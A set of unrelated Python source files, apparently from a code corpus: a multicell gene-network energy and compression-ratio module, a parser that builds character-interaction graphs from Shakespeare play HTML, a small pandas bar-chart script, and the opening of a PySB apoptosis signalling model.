exosome_remove_ratio=exosome_remove_ratio, neighbours=mf_neighbours)
if simsetup['FIELD_SEND'] is not None:
nbr_states_sent += cell.get_local_paracrine_field(lattice, neighbours, simsetup)
else:
nbr_states_sent, neighbours = cell.get_local_exosome_field(
lattice, search_radius, M1, exosome_string=exosome_string,
exosome_remove_ratio=exosome_remove_ratio, neighbours=None)
if simsetup['FIELD_SEND'] is not None:
nbr_states_sent += cell.get_local_paracrine_field(lattice, neighbours, simsetup)
"""
nbr_states_sent_01 = (nbr_states_sent + len(neighbours)) / 2.0
field_neighbours = np.dot(simsetup['FIELD_SEND'], nbr_states_sent_01)
print 'Hpair:', i,j, 'adding', np.dot(field_neighbours, cell.get_current_state())
print 'neighbours are', neighbours
print cell.get_current_label(), 'receiving from', \
[lattice[p[0]][p[1]].get_current_label() for p in neighbours]
print 'cell state', cell.get_current_state()
print 'nbr field', nbr_states_sent
print 'nbr field 01', nbr_states_sent_01
print 'field_neighbours', field_neighbours
"""
H_pairwise += np.dot(nbr_states_sent, cell.get_current_state())
H_pairwise_scaled = - H_pairwise * gamma / 2 # divide by two because double-counting neighbours
if norm:
H_self = H_self / num_cells
H_app = H_app / num_cells
H_pairwise_scaled = H_pairwise_scaled / num_cells
H_multi = H_self + H_app + H_pairwise_scaled
return H_multi, H_self, H_app, H_pairwise_scaled
def calc_graph_energy(multicell, step, norm=True):
"""
Graph energy is the multicell hamiltonian
H_multi = [Sum (H_internal)] - gamma * [Sum(interactions)] - fs * [app_field dot Sum(state)]
- Only valid for symmetric J, W, A matrices
- Field should be 1D arr of size num_cells * num_genes, already scaled by field strength kappa
- Returns total energy and the three main terms
H_quadratic_form, H_multi, H_self, H_app, H_pairwise_scaled
- Expect H_quadratic_form to equal H_multi when no_exo_field is used
"""
num_cells = multicell.num_cells
H_self = 0
H_pairwise = 0
H_app = 0
# TODO how to incorporate exosomes
H_quadratic_form = -0.5 * np.dot(np.dot(multicell.matrix_J_multicell,
multicell.graph_state_arr[:, step]),
multicell.graph_state_arr[:, step]) \
- np.dot(multicell.field_applied[:, step], multicell.graph_state_arr[:, step])
for a in range(num_cells):
cell_state = multicell.get_cell_state(a, step)
# compute self energies and applied field contribution separately
H_self += hamiltonian(cell_state, multicell.matrix_J, field=None, fs=0.0)
# compute applied field term on that cell
field_on_cell = multicell.get_field_on_cell(a, step)
H_app -= np.dot(cell_state.T, field_on_cell)
# compute interactions # TODO check validity
# note that a cell's neighbours are the ones which 'send' to it
# if A_ij = 1, then there is a connection from i to j
# to get all the senders to cell i, we need to look at col i
graph_neighbours_col = multicell.matrix_A[:, a]
graph_neighbours = [idx for idx, i in enumerate(graph_neighbours_col) if i == 1]
field_signal_exo, _ = general_exosome_field(multicell, a, step, neighbours=graph_neighbours)
field_signal_W = general_paracrine_field(
multicell, a, step, flag_01=False, neighbours=graph_neighbours)
field_signal_unscaled = field_signal_exo + field_signal_W
H_pairwise -= np.dot(field_signal_unscaled, cell_state)
# divide by two because double-counting neighbours
H_pairwise_scaled = H_pairwise * multicell.gamma / 2
if norm:
H_quadratic_form = H_quadratic_form / num_cells
H_self = H_self / num_cells
H_app = H_app / num_cells
H_pairwise_scaled = H_pairwise_scaled / num_cells
H_multi = H_self + H_app + H_pairwise_scaled
return H_quadratic_form, H_multi, H_self, H_app, H_pairwise_scaled
def get_state_of_lattice(lattice, simsetup, datatype='full'):
M1 = len(lattice)
M2 = len(lattice[0])
if datatype == 'full':
x = np.zeros((M1, M2, simsetup['N']), dtype=int)
for i in range(M1):
for j in range(M2):
cell = lattice[i][j]
x[i,j,:] = (1 + cell.get_current_state()) / 2.0 # note 01 rep
return x
def calc_compression_ratio(x, eta_0=None, datatype='full', elemtype=np.bool, method='manual'):
"""
TODO add an eta_min ref point as all zeros of np.int with shape x.shape
x - the data object (assume lies between -1 and 1)
eta_0 is meant to be a rough upper bound on eta(x)
- compute via 'maximally disordered' input x (random data)
Returns eta(x)/eta_0 ranging between 0 and 1 +- eps
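Minimal usage sketch (lattice and simsetup as used elsewhere in this module):
x = get_state_of_lattice(lattice, simsetup, datatype='full')
ratio, eta, eta_0 = calc_compression_ratio(x, datatype='full', elemtype=np.bool)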
"""
assert method in ['manual', 'package']
assert datatype in ['full', 'custom']
assert elemtype in [np.bool, np.int, np.float]
def foo(x_to_compress):
fname = 'tmp.npz'
np.savez_compressed(fname, a=x_to_compress)
fsize = os.path.getsize(fname)
os.remove(fname)
return fsize
if datatype == 'full':
if eta_0 is None:
x_random = np.random.randint(0, high=2, size=x.shape, dtype=np.int)
eta_0 = foo(x_random) # consider max over few realizations?
if x.dtype != elemtype:
print('NOTE: Recasting x as elemtype', elemtype, 'from', x.dtype)
x = x.astype(dtype=elemtype)
eta = foo(x)
else:
assert datatype == 'custom'
if eta_0 is None:
assert -1 <= np.min(x) <= np.max(x) <= 1
#x_random = np.random.rand(*(x.shape))*2 - 1 # TODO flag ref as float or bool
if elemtype==np.bool:
if x.dtype!=np.bool:
print('NOTE: Recasting x as np.float from', x.dtype)
x = x.astype(dtype=np.bool)
x_random = np.random.randint(0, high=2, size=x.shape, dtype=np.bool)
elif elemtype==np.int:
assert np.issubdtype(x.dtype, np.int)
nint = len(set(x))
x_random = np.random.randint(0, high=nint+1, size=x.shape, dtype=np.int)
else:
assert elemtype==np.float
if x.dtype!=np.float:
print('NOTE: Recasting x as np.float from', x.dtype)
x = x.astype(dtype=np.float)
x_random = np.random.rand(*(x.shape)) * 2 - 1
eta_0 = foo(x_random) # consider max over few realizations?
eta = foo(x)
return float(eta)/eta_0, eta, eta_0
def test_compression_ratio():
nn = 10000
print("test_compression_ratio for x: %dx1 array..." % nn)
x1 = np.ones(nn, dtype=np.int) #[1, 1, 1, 1]
x2 = np.zeros(nn, dtype=np.int) #[-1, -1, -1, -1]
x3 = np.random.randint(0, high=2, size=nn)
eta_ratio_1, eta_1, eta_0_1 = \
calc_compression_ratio(x1, eta_0=None, datatype='custom', method='manual', elemtype=np.bool)
eta_ratio_2, eta_2, eta_0_2 = \
calc_compression_ratio(x2, eta_0=None, datatype='custom', method='manual', elemtype=np.bool)
eta_ratio_3, eta_3, eta_0_3 = \
calc_compression_ratio(x3, eta_0=None, datatype='custom', method='manual', elemtype=np.bool)
print('x1', 'gives', eta_ratio_1, eta_1, eta_0_1)
print('x2', 'gives', eta_ratio_2, eta_2, eta_0_2)
print('x3', 'gives', eta_ratio_3, eta_3, eta_0_3)
xshape = (1000, 500)
print("test_compression_ratio for x: %d x %d array..." % (xshape[0], xshape[1]))
x1 = np.ones(xshape)
x2 = -np.ones(xshape)
x3 = np.zeros(xshape)
x4 = np.zeros(xshape)
x4[:,0] = 1
x5 = np.random.rand(*xshape)*2 - 1
print(x5.shape)
x6 = np.random.randint(-1, high=2, size=xshape)
x7 = np.random.randint(0, high=2, size=xshape) * 2 - 1
x_dict ={1: {'data': x1, 'label': 'all +1', 'dtype': np.bool},
2: {'data': x2, 'label': 'all -1', 'dtype': np.bool},
3: {'data': x3, 'label': 'all 0', 'dtype': np.bool},
4: {'data': x4, 'label': 'all 0 except all 1 first col', 'dtype': np.bool},
5: {'data': x5, 'label': 'rand floats -1 to 1', 'dtype': np.float},
6: {'data': x6, 'label': 'rand ints -1, 0, 1', 'dtype': np.float},
7: {'data': x7, 'label': 'rand ints -1, 1', 'dtype': np.float}}
for idx in range(1, len(list(x_dict.keys()))+1):
elem = x_dict[idx]['data']
elemtype = x_dict[idx]['dtype']
eta_ratio, eta, eta_0 = calc_compression_ratio(
elem, eta_0=None, datatype='custom', method='manual', elemtype=elemtype)
print(x_dict[idx]['label'], 'gives', eta_ratio, eta, eta_0)
return None
if __name__ == '__main__':
test_compression_ratio()
|
py | 1a4b84a4e1713c36e9be6eadd66ac72a8f37b8e4 | # Just ? and To Sb. are considered
# regular expression
import re,sys
def preprocessing(f,sf,logg):
excep = ['ALL','All','all','BOTH','Both','both','AND','And','and','BUT','But','but', ',']
stage = set()
nodes = []
temp_file = open('temp.xml','w+')
coun = 0 # to determine if no one is specified after exit
last_guy = ''
# parse characters as nodes
f.seek(0)
for line in f:
if '<a name=\"speech' in line or '<A NAME=speech' in line:
protagonist = line[line.index('<b>')+3:line.index('</b>')].strip()
if 'but' in protagonist:
protagonist = protagonist[:protagonist.index('but')]
protagonist = re.sub(r'and ','',protagonist).strip()
protagonist = re.sub(r',',' ',protagonist).strip()
if len(set(protagonist.split(' ')).intersection(set(excep)))==0:
protagonist = re.sub(r' ',r'_',protagonist).strip()
if protagonist not in nodes:
nodes.append(protagonist)
# spaces within a character name are replaced by underscores
line = line[:line.index('<b>')+3]+protagonist+line[line.index('</b>'):]
temp_file.write(line)
# parse stage
f.seek(0)
temp_file.seek(0)
for no,line in enumerate(temp_file):
if '<i>' in line and ('Enter' in line or 'enter' in line):# include Re-enter
# line ends with \n, which would not interrupt <i>...</i>
# safely to filter with if '</i>' in line:
words = line[line.index('<i>')+3:line.index('</i>')]
# substitute anything other than identifier characters, i.e. \W
words = re.sub(r'[^0-9a-zA-Z_]',' ',words).strip()
for w in words.split(' '):
if w in nodes and w not in stage:# A' wife, witches
stage.add(w)
logg.write(str(no+1)+' -Enter- : '+w+'\n')
if '<i>' in line and \
('Exit' in line or 'Exeunt' in line or 'exit' in line or 'exeunt' in line or 'Dies' in line or 'dies' in line):# Exeunt A and/, B; Exit all; Exeunt all witches
if 'Exit' in line:
e = 'Exit'
elif 'exit' in line:
e = 'exit'
elif 'Exeunt' in line:
e = 'Exeunt'
elif 'exeunt' in line:
e = 'exeunt'
elif 'Dies' in line:
e = 'Dies'
elif 'dies' in line:
e = 'dies'
# For examples like 'Exit all witches', 'Exeunt both murderers'
# TO DO
if line[line.index(e)+len(e)]==' ': # Not exit/exeunt alone
exit_people = line[line.index(e)+len(e):line.index('</i>')].strip()
exit_people = re.sub(r'[,.?!;]',' ',exit_people).strip()
exit_people = re.sub(r'and ',' ',exit_people).strip()
if 'but' in exit_people:
exit_people = exit_people[:exit_people.index('but')]
if 'except' in exit_people:
exit_people = exit_people[:exit_people.index('except')]
for n in exit_people.split(' '):
if n in stage:
stage.remove(n)
elif e=='Exeunt' or e=='exeunt': # exit all
stage.clear()
logg.write(str(no+1)+' -Exeunt: Clear Stage- : '+'\n')
elif (e=='Exit' or e=='exit' or e=='Dies' or e=='dies') and last_guy!='':
stage.remove(last_guy)
if 'SCENE' in line or 'Scene' in line:
last_guy = ''
stage.clear()
logg.write(str(no+1)+' -SCENE: Clear Stage- : '+'\n')
if '[Aside to' in line:
t = '[Aside to'
line = line[:line.index(t)+1]+'To'+line[line.index(t)+9:]
if '<a name=\"speech' in line or '<A NAME=speech' in line:# To check if someone is not explicitly narrated in the enter line
protagonist = line[line.index('<b>')+3:line.index('</b>')].strip()
# Tackle 'ALL' and 'BOTH'
if 'ALL' in protagonist or 'All' in protagonist or 'BOTH' in protagonist or 'Both' in protagonist: # Both murderers, All witches
if 'ALL' in line:
a = 'ALL'
elif 'All' in line:
a = 'All'
elif 'BOTH' in line:
a = 'BOTH'
elif 'Both' in line:
a = 'Both'
if ' ' in protagonist: # group members like 'All witches'
protagonist = protagonist[len(a)+1:].strip()
new_p = ''
for s in stage:
if (s[0]==protagonist[0] or s[0].lower()==protagonist[0]) and s[1:-2]==protagonist[1:-2]:
new_p = new_p + ' ' + s
protagonist = new_p.strip()
else: # solo word like ALL, BOTH
protagonist = re.sub(a,' ',protagonist).strip()
protagonist = re.sub(r',',' ',protagonist).strip()
for s in stage:
protagonist = protagonist + ' ' + s
protagonist = protagonist.strip()
line = line[:line.index('<b>')+3]+protagonist+line[line.index('</b>'):]
elif ' ' not in protagonist:
last_guy = protagonist
if protagonist not in stage:
stage.add(protagonist)
elif ' ' in protagonist:
for p in protagonist.split(' '):
if p not in stage:
stage.add(p)
sf.write(line)
return nodes
def parse_edge(text, nodes, logg):
#excep = ['ALL','All','all','BOTH','Both','both','AND','And','and','BUT','But','but', ',']
edges = {}
ask = False # lines ends up with ? mark
last_guy = ''
last_no = 0
spoken_to = ''
temp = ''
add_weight = [] # characters last_guy has addressed via 'To Sb.' in the current speech, to avoid double counting
# all_weight = [] # more than one guy has speaked simultaneously
# all_no = 0
text.seek(0)
for no, line in enumerate(text):
if '</blockquote>' in line: # End of someone's lines
if len(add_weight)>0:
for char in add_weight:
temp = last_guy +','+char
edges[temp] = edges[temp] + no
logg.write(str(no+1)+' -TO- Conclude weight: '+temp+', '+str(edges[temp])+'\n')
# if len(all_weight)>0:
# for p in all_weight:
# for char in all_weight:
# if char!=p:
# # bidirection
# temp = p +','+char
# if temp not in edges.keys():
# edges[temp] = no - all_no
# else:
# edges[temp] = edges[temp] + no - all_no
# logg.write(str(no+1)+' -Simul- Conclude weight: '+temp+', '+str(edges[temp])+'\n')
#
# all_weight = []
# all_no = 0
elif 'SCENE' in line or 'Scene' in line:
last_guy = ''
last_no = 0
ask = False
spoken_to = ''
add_weight = []
logg.write(str(no+1)+' -SCENE: Clear Stage- : '+'\n')
elif ('<a name=\"' in line or '<A NAME=' in line) and line[line.index('=')+1].isdigit()==True:#speaking lines
#logg.write(str(no+1)+' - Speaking line: '+line)
if '[To ' in line: # [to Sb.]
spoken_to = line[line.index('[To')+len('[To'):line.index(']')].strip()
if 'but' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('but')]
if 'except' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('except')]
spoken_to = re.sub('and\s*','',spoken_to)
spoken_to = re.sub(',',' ',spoken_to)
for char in spoken_to.split(' '):
if char in nodes and char!=last_guy:
temp = last_guy +','+char
add_weight.append(char)
if temp not in edges.keys():
edges[temp] = -no
else:
edges[temp] = edges[temp] - no
logg.write(str(no+1)+' -Aside to- Start with key: '+temp+'\n')
spoken_to = ''
if ask==True:# turn off the above question
ask = False
#print 'Last simbol of lines is :' not -2
if '</a>' in line and line[line.index('</a>')-1]=='?'or '</A>' in line and line[line.index('</A>')-1]=='?':
ask = True
elif '<i>To ' in line:# To somebody
spoken_to = line[line.index('To')+3:line.index('</i>')]
if 'but' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('but')]
if 'except' in spoken_to:
spoken_to = spoken_to[:spoken_to.index('except')]
spoken_to = re.sub('and\s*','',spoken_to)
spoken_to = re.sub(',',' ',spoken_to)
for char in spoken_to.split(' '):
if char in nodes and char!=last_guy:
temp = last_guy +','+char
add_weight.append(char)
if temp not in edges.keys():
edges[temp] = -no
else:
edges[temp] = edges[temp] - no
logg.write(str(no+1)+' -TO- Start with key: '+temp+'\n')
spoken_to = ''
elif '<a name=\"speech' in line or '<A NAME=speech' in line: #character line
protagonist = line[line.index('<b>')+3:line.index('</b>')]
if 'but' in protagonist:
protagonist = protagonist[:protagonist.index('but')]
if 'except' in protagonist:
protagonist = protagonist[:protagonist.index('except')]
protagonist = re.sub('and\s*','',protagonist)
protagonist = re.sub(',','',protagonist)
logg.write(str(no+1)+' - Character line: '+protagonist+'\n')
# Someone speak simutaneously could be seemed as silent contact before words out
# if ' ' in protagonist:
# logg.write(str(no+1)+' -Simul- Spotted!: '+protagonist+'\n')
# all_no = no
# for p in protagonist.split(' '):
# if p in nodes:
# all_weight.append(p)
# #if ask==True:
# all_weight.remove(last_guy)
if len(add_weight)>0: # Exclude anyone already counted in 'To sb.'
for char in add_weight:
if char in protagonist.split(' '):
protagonist = re.sub(char,'',protagonist)
protagonist = re.sub(r' ','',protagonist)
logg.write(str(no+1)+' - Exclude from TO: '+char+'\n')
add_weight = []
#l = set(protagonist).intersection(set(excep))
logg.write(str(no+1)+' - After washing: '+protagonist+'\n')
logg.write(str(no+1)+' - Before entering ASK: '+'\n')
logg.write(str(no+1)+' - ask = : '+str(ask)+'\n')
if ask==True and len(protagonist)>0: #last_guy has asked
ask = False
if protagonist in nodes and protagonist!=last_guy:
temp = last_guy +','+protagonist
if temp not in edges.keys():
edges[temp] = no - last_no
else:
edges[temp] = edges[temp] + no - last_no
logg.write(str(no+1)+' -?1- Conclude ASK: '+temp+', '+str(edges[temp])+'\n')
else:# Maybe confused by space in character
for char in protagonist.split(' '):
if char!='' and char in nodes and char!=last_guy:
temp = last_guy +','+char
if temp not in edges.keys():
edges[temp] = no - last_no
else:
edges[temp] = edges[temp] + no - last_no
logg.write(str(no+1)+' -?2- Conclude ASK: '+temp+', '+str(edges[temp])+'\n')
if line[line.index('<b>')+3:line.index('</b>')] in nodes:
last_guy = line[line.index('<b>')+3:line.index('</b>')]
last_no = no
logg.write(str(no+1)+' - Update last_guy: '+last_guy+'\n')
return edges
def reconstruct(f,logg,chars,directed):
isolated = []
match = 0
last_guy = ''
last_no = 0
temp = ''
complement = {}
flag = 0
no = 0
line = ''
#to find nodes that are not connected
for n in chars:
match = 0
for k in directed.keys():
for word in re.split(r',',k):
if n == word:
match = 1
if match==0:
isolated.append(n)
# Isolated nodes are:
print 'Isolated node: '
for w in isolated:
print w+',',
print '\n'
logg.write('---------------Here comes compensated eges!-----------------\n')
f.seek(0) # Important: without rewinding the file, the following loop would read nothing and only produce errors.
#To complement
for no,line in enumerate(f):
if 'SCENE' in line or 'Scene' in line:
last_guy = ''
last_no = 0
logg.write(str(no+1)+' -SCENE: Clear Stage- : '+'\n')
elif '<a name=\"speech' in line or '<A NAME=speech' in line: #character line
protagonist = line[line.index('<b>')+3:line.index('</b>')]
if 'but' in protagonist:
protagonist = protagonist[:protagonist.index('but')]
if 'except' in protagonist:
protagonist = protagonist[:protagonist.index('except')]
protagonist = re.sub('and\s*','',protagonist)
protagonist = re.sub(',','',protagonist)
if protagonist!='' and last_guy!='' and protagonist in chars and protagonist!=last_guy and (protagonist in isolated or last_guy in isolated):
temp = last_guy +','+protagonist
if temp not in complement.keys():
complement[temp] = no - last_no
else:
complement[temp] = complement[temp] + no - last_no
logg.write(str(no+1)+' -C1- Compensate one: '+temp+', '+str(complement[temp])+'\n')
else:
for char in protagonist.split(' '):
if char!='' and last_guy!='' and char!=last_guy and (char in isolated or last_guy in isolated):
temp = last_guy +','+char
if temp not in complement.keys():
complement[temp] = no - last_no
else:
complement[temp] = complement[temp] + no - last_no
logg.write(str(no+1)+' -C2- Compensate one: '+temp+', '+str(complement[temp])+'\n')
if protagonist in chars:
last_guy = protagonist
last_no = no
logg.write(str(no+1)+' - Update last_guy: '+last_guy+'\n')
print 'Done with reconstruction.'
return complement
def main(argv):
#temp = ''
tran = 0.0
aggregate = 0.0
mean = 0.0
#factor = .5
#match = False
less = []
ldet = 0.0
alpha = 2
tu =0.95
strong_edge = 0
f = open(argv[1],'r')
log_file = open(argv[1][:argv[1].index('.html')]+'_log.txt','w')
standard_file = open(argv[1][:argv[1].index('.html')]+'_standard.xml','w+')
node_file = open(argv[1][:argv[1].index('.html')]+'_nodes.txt','w')
edge_file = open(argv[1][:argv[1].index('.html')]+'_edges.txt','w')
# compensated_file=open(argv[1][:argv[1].index('.html')]+'_compensated_edges.txt','w')
node_file.write('Id,Label\n')
nodes = preprocessing(f,standard_file, log_file)
#print nodes
edge_file.write('Source,Target,Type,Weight\n')
edges = parse_edge(standard_file, nodes, log_file)
# calculate the mean value of weights
for k,v in edges.iteritems():
aggregate = aggregate + v
mean = aggregate/len(edges)
print 'Mean value is '+str(mean)
# count edges whose weight is less than or equal to the mean
print 'less than mean: '
for k,v in edges.iteritems():
if v<=mean:
less.append(v)
print v
print 'count of edges: '+str(len(edges))
print 'count of less: '+str(len(less))
# count accumulative (mean-v)
for v in less:
ldet+=mean-v
ldet/=len(less)
tran = mean-alpha*ldet
print 'ldet: '+str(ldet)
print 'tran: '+str(tran)
nodes = []
log_file.write('-----Here comes new nodes------\n')
# eliminate nodes without links
for key in edges.keys():
for k in re.split(r',',key):
if k not in nodes:
nodes.append(k)
log_file.write(k+'\n')
# write nodes into file
for k,v in enumerate(nodes):
node_file.write(str(k+1)+','+v+'\n')
for k,v in edges.iteritems():
##print k+','+str(v)
for n in re.split(r',',k):
edge_file.write(str(nodes.index(n)+1))
edge_file.write(',')
edge_file.write('Directed')
edge_file.write(',')
# convert the raw weight into a fuzzy strong/weak label
#print 'v is :'+str(v)
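# (Sketch of the rule below: weights above the mean are 'strong'; weights between
#  tran = mean - alpha*ldet and the mean count as 'strong' only when their fuzzy
#  membership (v - tran)/(alpha*ldet) exceeds tu = 0.95; everything else is 'weak'.)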
if v>mean or (v<=mean and v>=tran and (v-tran)/(alpha*ldet)>tu):
edge_file.write(str(20))
#print 'v-t/a*l > tu:'+str((v-tran)/alpha*ldet)
print 'Strong!'
strong_edge+=1
else:
edge_file.write(str(10))
print 'Weak!'
edge_file.write('\n')
print 'strong_edge count is '+str(strong_edge)
print 'weak_edge count is '+str(len(edges)-strong_edge)
log_file.write('---------------Here comes regular edges!--------------------\n')
for k,v in edges.iteritems():
log_file.write(k+','+str(v)+'\n')
# print '---------------Here comes compensated edges!--------------------'
# compensated_file.write('Source,Target,Type,Weight\n')
# compensated = reconstruct(standard_file,log_file,nodes,edges)
# for k,v in compensated.iteritems():
# print k+','+str(v)
# for n in re.split(r',',k):
# compensated_file.write(str(nodes.index(n)+1))
# compensated_file.write(',')
# compensated_file.write('Directed')
# compensated_file.write(',')
# compensated_file.write(str(int(v*factor)))
# compensated_file.write('\n')
# log_file.write('---------------Here comes compensated edges!--------------------\n')
# for k,v in compensated.iteritems():
# log_file.write(k+','+str(v)+'\n')
if __name__ == '__main__':
main(sys.argv)
|
py | 1a4b84e1a6965fe557a278121f7b31201667bf93 | import pandas as pd
data = [[45939, 21574, 2876, 1815, 1646, 89, 555],
[60423, 29990, 4708, 2568, 2366, 1411, 733],
[64721, 32510, 5230, 2695, 2526, 1546, 773],
[68484, 35218, 6662, 2845, 2691, 1663, 836],
[71799, 37598, 6856, 3000, 2868, 1769, 911],
[76036, 40341, 8220, 3145, 3054, 1905, 1008],
[79831, 43173, 9053, 3338, 3224, 2005, 1076]]
data = pd.DataFrame(
data = data,
index = [1951, 1956, 1957, 1958, 1959, 1960, 1961],
columns = ['N.Amer', 'Europe', 'Asia', 'S.Amer', 'Oceania', 'Africa', 'Mid.Amer']
)
data
for col in data.columns:
fig = data.plot.bar(y=col).get_figure().savefig('figs/' + col + '.png')
from jinja2 import Template
str = open('templates/index.html', 'r').read()
template = Template(str)
str = template.render(regions=data.columns.tolist())
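# A template along these lines would work with the render call above (illustrative only;
# the real templates/index.html is not shown in this snippet):
#     <html><body>
#     {% for region in regions %}
#       <h2>{{ region }}</h2><img src="figs/{{ region }}.png">
#     {% endfor %}
#     </body></html>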
open('index.html', 'w').write(str); |
py | 1a4b86f34e281a1a16871c5d3c0c2b78e6005f7c | # exported from PySB model 'model'
from pysb import Model, Monomer, Parameter, Expression, Compartment, Rule, Observable, Initial, MatchOnce, Annotation, ANY, WILD
Model()
Monomer('Ligand', ['Receptor'])
Monomer('ParpU', ['C3A'])
Monomer('C8A', ['BidU'])
Monomer('BaxM', ['BidM', 'BaxA'])
Monomer('Apop', ['C3pro', 'Xiap'])
Monomer('Fadd', ['Receptor', 'C8pro'])
Monomer('ParpC')
Monomer('Xiap', ['Apop', 'C3A'])
Monomer('C9')
Monomer('C3ub')
Monomer('C8pro', ['Fadd'])
Monomer('C3pro', ['Apop'])
Monomer('CytoCM', ['BaxA'])
Monomer('CytoCC')
Monomer('BaxA', ['BaxM', 'BaxA_1', 'BaxA_2', 'CytoCM'])
Monomer('ApafI')
Monomer('BidU', ['C8A'])
Monomer('BidT')
Monomer('C3A', ['Xiap', 'ParpU'])
Monomer('ApafA')
Monomer('BidM', ['BaxM'])
Monomer('Receptor', ['Ligand', 'Fadd'])
Parameter('bind_0_Ligand_binder_Receptor_binder_target_2kf', 1.0)
Parameter('bind_0_Ligand_binder_Receptor_binder_target_1kr', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_2kf', 1.0)
Parameter('bind_0_Receptor_binder_Fadd_binder_target_1kr', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_2kf', 1.0)
Parameter('substrate_binding_0_Fadd_catalyzer_C8pro_substrate_1kr', 1.0)
Parameter('catalytic_step_0_Fadd_catalyzer_C8pro_substrate_C8A_product_1kc', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_2kf', 1.0)
Parameter('catalysis_0_C8A_catalyzer_BidU_substrate_BidT_product_1kr', 1.0)
Parameter('catalysis_1_C8A_catalyzer_BidU_substrate_BidT_product_1kc', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_2kf', 1.0)
Parameter('conversion_0_CytoCC_subunit_d_ApafI_subunit_c_ApafA_complex_1kr', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_2kf', 1.0)
Parameter('conversion_0_C9_subunit_d_ApafA_subunit_c_Apop_complex_1kr', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_2kf', 1.0)
Parameter('catalysis_0_Apop_catalyzer_C3pro_substrate_C3A_product_1kr', 1.0)
Parameter('catalysis_1_Apop_catalyzer_C3pro_substrate_C3A_product_1kc', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_2kf', 1.0)
Parameter('inhibition_0_Xiap_inhibitor_Apop_inh_target_1kr', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_2kf', 1.0)
Parameter('catalysis_0_Xiap_catalyzer_C3A_substrate_C3ub_product_1kr', 1.0)
Parameter('catalysis_1_Xiap_catalyzer_C3A_substrate_C3ub_product_1kc', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_2kf', 1.0)
Parameter('catalysis_0_C3A_catalyzer_ParpU_substrate_ParpC_product_1kr', 1.0)
Parameter('catalysis_1_C3A_catalyzer_ParpU_substrate_ParpC_product_1kc', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kf', 1.0)
Parameter('equilibration_0_BidT_equil_a_BidM_equil_b_1kr', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_2kf', 1.0)
Parameter('catalysis_0_BidM_catalyzer_BaxM_substrate_BaxA_product_1kr', 1.0)
Parameter('catalysis_1_BidM_catalyzer_BaxM_substrate_BaxA_product_1kc', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_2kf', 1.0)
Parameter('self_catalyze_0_BaxA_self_catalyzer_BaxM_self_substrate_1kr', 1.0)
Parameter('self_catalyze_1_BaxA_self_catalyzer_BaxM_self_substrate_1kc', 1.0)
Parameter('pore_formation_0_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_0_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_1_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_1_BaxA_pore_1kr', 1.0)
Parameter('pore_formation_2_BaxA_pore_2kf', 1.0)
Parameter('pore_formation_2_BaxA_pore_1kr', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_2kf', 1.0)
Parameter('transport_0_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kr', 1.0)
Parameter('transport_1_BaxA_pore_CytoCM_cargo_M_CytoCC_cargo_C_1kc', 1.0)
Parameter('Ligand_0', 1000.0)
Parameter('ParpU_0', 1000000.0)
Parameter('C8A_0', 0.0)
Parameter('BaxM_0', 40000.0)
Parameter('Apop_0', 0.0)
Parameter('Fadd_0', 130000.0)
Parameter('ParpC_0', 0.0)
Parameter('Xiap_0', 92250.0)
Parameter('C9_0', 100000.0)
Parameter('C3ub_0', 0.0)
Parameter('C8pro_0', 130000.0)
Parameter('C3pro_0', 21000.0)
Parameter('CytoCM_0', 500000.0)
Parameter('CytoCC_0', 0.0)
Parameter('BaxA_0', 0.0)
Parameter('ApafI_0', 100000.0)
Parameter('BidU_0', 171000.0)
Parameter('BidT_0', 0.0)
Parameter('C3A_0', 0.0)
Parameter('ApafA_0', 0.0)
Parameter('BidM_0', 0.0)
Parameter('Receptor_0', 100.0)
Observable('Ligand_obs', Ligand())
Observable('ParpU_obs', ParpU())
Observable('C8A_obs', C8A())
Observable('BaxM_obs', BaxM())
Observable('Apop_obs', Apop())
Observable('Fadd_obs', Fadd())
Observable('ParpC_obs', ParpC())
Observable('Xiap_obs', Xiap())
Observable('C9_obs', C9())
Observable('C3ub_obs', C3ub())
Observable('C8pro_obs', C8pro())
Observable('C3pro_obs', C3pro())
Observable('CytoCM_obs', CytoCM())
Observable('CytoCC_obs', CytoCC())
Observable('BaxA_obs', BaxA())
Observable('ApafI_obs', ApafI())
Observable('BidU_obs', BidU())
Observable('BidT_obs', BidT())
Observable('C3A_obs', C3A())
Observable('ApafA_obs', ApafA())
Observable('BidM_obs', BidM())
Observable('Receptor_obs', Receptor())
Rule('bind_0_Ligand_binder_Receptor_binder_target', Ligand(Receptor=None) + Receptor(Ligand=None, Fadd=None) | Ligand(Receptor=1) % Receptor(Ligand=1, Fadd=None), bind_0_Ligand_binder_Receptor_binder_target_2kf, bind_0_Ligand_binder_Receptor_binder_target_1kr)
Rule('bind_0_Receptor_binder_Fadd_binder_target', Receptor(Ligand=ANY, Fadd=None) + Fadd(Receptor=None, C8pro=None) | Receptor(Ligand=ANY, Fadd=1) % Fadd(Receptor=1, C8pro=None), bind_0_Receptor_binder_Fadd_binder_target_2kf, bind_0_Receptor_binder_Fadd_binder_target_1kr)
